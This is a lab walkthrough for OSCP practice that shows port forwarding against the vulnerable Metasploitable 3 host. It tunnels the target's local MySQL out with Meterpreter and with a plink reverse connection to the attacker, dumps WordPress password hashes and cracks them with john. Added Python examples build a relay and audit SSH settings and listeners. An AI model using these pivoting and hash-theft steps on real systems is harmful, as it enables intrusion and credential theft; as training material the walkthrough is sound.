
This is the Metasploitable 3 port forwarding tutorial. Port forwarding is something that can be extremely confusing, but it is really meant to be simple. With the OSCP exam in mind, I decided to write this tutorial on how to use several port forwarding techniques, demonstrated against the Metasploitable 3 host.

Metasploitable 3 has many vulnerable apps installed that can help you get better at ethical hacking. Have you tried ManageEngine Desktop Central yet? See how I think it should be done in the tutorial.

Keep in mind that using Meterpreter's port forwarding capabilities counts as your one permitted use of Metasploit on the OSCP exam.

Local Services Unreachable

Remote port forwarding is for when you want to access a service on an internal network. Notice how, when we ran Nmap against the Metasploitable 3 host, TCP port 3306 was not open? There is a solid reason for this.

TCP-3306 is the MySQL port. Database connections are not supposed to be open to everything on the network, which is why they are purposefully closed off. This usually means the MySQL server is configured to listen on localhost only.

TCP-3389 and TCP-3306 are running locally and hidden from the rest of the network.

Meterpreter Port Forwarding

Using Meterpreter for port forwarding is different from other tools in that we only define the remote target host, not our local host (which would be Kali). We are going to forward traffic arriving on a local port of the Kali VM to the remote Metasploitable 3 host.

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
     -L <opt>  The local host to listen on (optional).
     -h        Help banner.
     -l <opt>  The local port to listen on.
     -p <opt>  The remote port to connect on.
     -r <opt>  The remote host to connect on.

Forwarding local port 3306 to remote port 3306 on Metasploitable 3.

portfwd add -l 3306 -p 3306 -r 192.168.56.101

Once that TCP relay is established, we can access the MySQL service by running Kali's built-in MySQL client.

mysql -u root -h 127.0.0.1
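To make the mechanism concrete, here is an added example of the TCP relay that portfwd sets up; it is my own code, not from the original post and not Metasploit's implementation. A listener on the Kali side accepts a connection and shuttles bytes in both directions to the remote host and port. In place of a real MySQL server it starts a loopback echo service, constructed for the demo, and returns whatever came back through the relay. The relay binds to 127.0.0.1 by default, the same idea as portfwd's optional -L: a relay bound to 0.0.0.0 would expose the forwarded service to anything that can reach the Kali VM.

```python
import socket
import threading


def _pump(src, dst):
    """Copy bytes from src to dst until src hits EOF, then half-close dst so the
    far side sees the EOF too (this is what keeps the relay transparent)."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(client, remote_host, remote_port):
    """One accepted connection: connect to the remote service, relay both directions."""
    try:
        remote = socket.create_connection((remote_host, remote_port), timeout=5)
    except OSError:
        client.close()
        return
    remote.settimeout(None)
    client.settimeout(None)
    up = threading.Thread(target=_pump, args=(client, remote), daemon=True)
    down = threading.Thread(target=_pump, args=(remote, client), daemon=True)
    up.start()
    down.start()
    up.join()
    down.join()
    client.close()
    remote.close()


def _serve(listener, on_connection):
    """Accept loop with a short timeout so listener.close() ends the thread cleanly."""
    listener.settimeout(0.2)
    while True:
        try:
            conn, _ = listener.accept()
        except socket.timeout:
            continue
        except OSError:  # the listener was closed
            return
        threading.Thread(target=on_connection, args=(conn,), daemon=True).start()


def start_relay(remote_host, remote_port, local_port=0, bind_host="127.0.0.1"):
    """Listen on bind_host:local_port and relay every connection to remote_host:remote_port.
    Returns (listening_socket, bound_port); local_port=0 picks a free port."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((bind_host, local_port))
    listener.listen(5)
    threading.Thread(target=_serve,
                     args=(listener, lambda c: _handle(c, remote_host, remote_port)),
                     daemon=True).start()
    return listener, listener.getsockname()[1]


def start_echo_server():
    """Stand-in for the localhost-only service (constructed for this demo): echoes bytes back."""
    def echo(conn):
        with conn:
            conn.settimeout(None)
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    threading.Thread(target=_serve, args=(listener, echo), daemon=True).start()
    return listener, listener.getsockname()[1]


def relay_roundtrip(payload):
    """Send payload through a fresh relay to the echo service and return what comes back."""
    echo_listener, echo_port = start_echo_server()
    relay_listener, relay_port = start_relay("127.0.0.1", echo_port)
    try:
        with socket.create_connection(("127.0.0.1", relay_port), timeout=5) as c:
            c.sendall(payload)
            c.shutdown(socket.SHUT_WR)  # tell the relay we are done sending
            chunks = []
            while True:
                data = c.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks)
    finally:
        relay_listener.close()
        echo_listener.close()


if __name__ == "__main__":
    print(relay_roundtrip(b"SELECT 1;\n"))
```

The half-close in _pump is the detail that most home-grown relays get wrong: without it the client never sees EOF from the service and hangs after the last byte, which is exactly the symptom you would otherwise misdiagnose as a broken forward.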

Common Issues

Issue: I am getting this error message:

root@kali:/# mysql -u root -h localhost
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)

Solution: pass 127.0.0.1 with -h rather than localhost.

mysql -u root -h 127.0.0.1

Plink Remote Port Forwarding

Plink is another way to set up remote port forwarding. Plink is the command-line version of PuTTY, a Windows SSH client.

After doing remote port forwarding with Meterpreter in the last step, my local Kali VM is now listening on TCP-3306. That means I have forwarded the MySQL service traffic to my local port TCP-3306.

First upload plink to the target.

meterpreter > upload /usr/share/windows-binaries/plink.exe
[*] uploading  : /usr/share/windows-binaries/plink.exe -> plink.exe
[*] Uploaded 304.00 KiB of 304.00 KiB (100.0%): /usr/share/windows-binaries/plink.exe -> plink.exe
[*] uploaded   : /usr/share/windows-binaries/plink.exe -> plink.exe

Start the Kali Linux SSH Server

So we now know that plink is the Windows command-line PuTTY client; how does it work with Kali Linux? In general, these are the three steps for using plink with Kali Linux:

  • Start the SSH server on Kali Linux – service ssh start
  • Run plink on the Windows target – plink {attacker-ip} -R {remote-port}:{local-ip}:{local-port}
  • Log in to the service being forwarded, e.g. MySQL – mysql -u root -h 127.0.0.1

Upon running the plink command outlined in the steps above, you will be prompted for login credentials to the Kali SSH server. You have two options:

  • Create a new user and grant that user access to log in to the SSH server.
  • Permit the root user of Kali to log in to the SSH server.

For convenience I chose the second option. To do so, though, one change needs to be made to the SSH server configuration.

If you have not already, you will need to add or uncomment one line in /etc/ssh/sshd_config, depending on your VM. That line is PermitRootLogin yes.

root@kali:~# service ssh start
root@kali:~# nano /etc/ssh/sshd_config
root@kali:~# service ssh restart
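Before relying on that edit (and when reverting it once the exercise is over), it helps to know what sshd will actually use: sshd takes the first occurrence of a keyword and ignores later duplicates, a line starting with # is a comment, and lines after a Match block only apply conditionally. So uncommenting the stock #PermitRootLogin prohibit-password line and also adding PermitRootLogin yes further down does not give you root login. The checker below is an added example of mine, not code from the post; the config text is a constructed sample.

```python
# Constructed sample: a stock Debian-style sshd_config fragment where the default line is
# still commented out and the tutorial's line has been added below it.
SAMPLE_SSHD_CONFIG = """\
# This is the sshd server system-wide configuration file.
Port 22
#PermitRootLogin prohibit-password
PermitRootLogin yes
PasswordAuthentication yes
Match User backup
    PermitRootLogin no
"""


def effective_value(config_text, keyword):
    """Return the value sshd would use for keyword in the global section, or None if
    the keyword is never set there. Rules applied: the FIRST occurrence wins, keywords
    are case-insensitive, '#' lines are comments, 'Key=Value' is accepted as well as
    'Key Value', and parsing stops at the first Match block because everything after
    it is conditional rather than global."""
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.replace("=", " ", 1).split(None, 1)
        key = parts[0].lower()
        if key == "match":
            break
        if key == keyword.lower():
            return parts[1].strip() if len(parts) > 1 else ""
    return None


def check_permit_root_login(config_text):
    """Return (effective value, risky) where risky is True only for 'yes'."""
    value = effective_value(config_text, "PermitRootLogin")
    if value is None:
        # OpenSSH's built-in default when the directive is absent or commented out.
        value = "prohibit-password (sshd default: line absent or commented out)"
    risky = value.split()[0].lower() == "yes"
    return value, risky


if __name__ == "__main__":
    value, risky = check_permit_root_login(SAMPLE_SSHD_CONFIG)
    print(f"PermitRootLogin -> {value}  {'(root password login allowed)' if risky else ''}")
```

On the Kali box itself, sshd -T | grep -i permitrootlogin prints the value the running configuration actually resolves to, which is the quickest way to confirm the edit took effect before troubleshooting plink's login prompt.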

Now with a shell open on the target run the plink command.

plink 192.168.56.102 -R 9609:127.0.0.1:3306
Now in a plink session; notice how the terminal has changed?

I now have access to the Metasploitable 3 host's local MySQL service on my local Kali VM's TCP-9609 port. We can check that this is in fact happening by running netstat on Kali.

netstat -antup | grep 3306
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      4079/ruby           

Your netstat results should look something like the above.
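Note the local address in that row: the relay Meterpreter opened on Kali (the ruby process) is bound to 0.0.0.0, so it accepts connections from any host that can reach the Kali VM, not only from the local mysql client; the -L option in the portfwd help lets you bind it to 127.0.0.1 instead. The short audit below, an added example of mine rather than code from the post, parses netstat -antup output (the post's 3306 row plus constructed rows) and separates loopback-only listeners, which is exactly how the Metasploitable 3 MySQL service stayed hidden from Nmap in the first place, from listeners exposed on all or specific interfaces.

```python
# Constructed netstat -antup sample: the first LISTEN row is the post's own output
# (Meterpreter's portfwd relay); the remaining rows are made up to show other cases.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      4079/ruby
tcp        0      0 127.0.0.1:9609          0.0.0.0:*               LISTEN      2210/sshd
tcp        0      0 192.168.56.102:22       192.168.56.101:49732    ESTABLISHED 2210/sshd
tcp6       0      0 :::22                   :::*                    LISTEN      2210/sshd
tcp6       0      0 ::1:631                 :::*                    LISTEN      990/cupsd
udp        0      0 0.0.0.0:68              0.0.0.0:*                           812/dhclient
"""


def bind_scope(host):
    """Classify the local address a socket is bound to."""
    if host == "::1" or host.startswith("127."):
        return "loopback"
    if host in ("0.0.0.0", "::"):
        return "all-interfaces"
    return "specific-interface"


def listeners(netstat_text):
    """Parse netstat -antup output and return the listening sockets as dicts."""
    found = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 5 or not fields[0].startswith(("tcp", "udp")):
            continue
        proto, local, foreign = fields[0], fields[3], fields[4]
        if proto.startswith("tcp"):
            if len(fields) < 6 or fields[5] != "LISTEN":
                continue
            program = fields[6] if len(fields) > 6 else "-"
        else:
            # UDP has no state column; an unconnected socket shows '*' as the foreign port.
            if not foreign.endswith(":*"):
                continue
            program = fields[5] if len(fields) > 5 else "-"
        # rsplit copes with IPv6 forms such as ':::22' (host '::') and '::1:631'.
        host, port = local.rsplit(":", 1)
        found.append({"proto": proto, "host": host, "port": int(port),
                      "program": program, "scope": bind_scope(host)})
    return found


def exposed(netstat_text):
    """Listeners reachable from other hosts, i.e. everything not bound to loopback."""
    return [l for l in listeners(netstat_text) if l["scope"] != "loopback"]


def report(netstat_text):
    """One line per listener, flagged EXPOSED unless it is loopback-only."""
    lines = []
    for l in listeners(netstat_text):
        flag = "OK     " if l["scope"] == "loopback" else "EXPOSED"
        lines.append(f"{flag} {l['proto']:<5} {l['host']}:{l['port']:<6} "
                     f"{l['program']} ({l['scope']})")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_NETSTAT))
```

In the sample, the plink forward on 9609 shows up under sshd on 127.0.0.1 because sshd binds remote forwards to loopback unless GatewayPorts is enabled, whereas the Meterpreter relay on 3306 is flagged EXPOSED.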

This time, specify the port with --port:

mysql -u root -h 127.0.0.1 --port 9609

You can always escape the plink session by using the exit command!

Common Issues

Issue: I am getting this error:

C:\ManageEngine\DesktopCentral_Server\bin>plink 192.168.56.102 -R 1234:127.0.0.1:3306
plink 192.168.56.102 -R 1234:127.0.0.1:3306
FATAL ERROR: Network error: Connection refused

Solution: Try another port. e.g. plink 192.168.56.102 -R 9609:127.0.0.1:3306

Exploit

Now we can exploit the database, since I have root access to it, by dumping the password hashes for all the users found in the wp_users table.

select user_login, user_pass from wp_users;

From there it is trivial to crack the password hashes.

john --wordlist=/usr/share/wordlists/rockyou.txt wp_users 
error: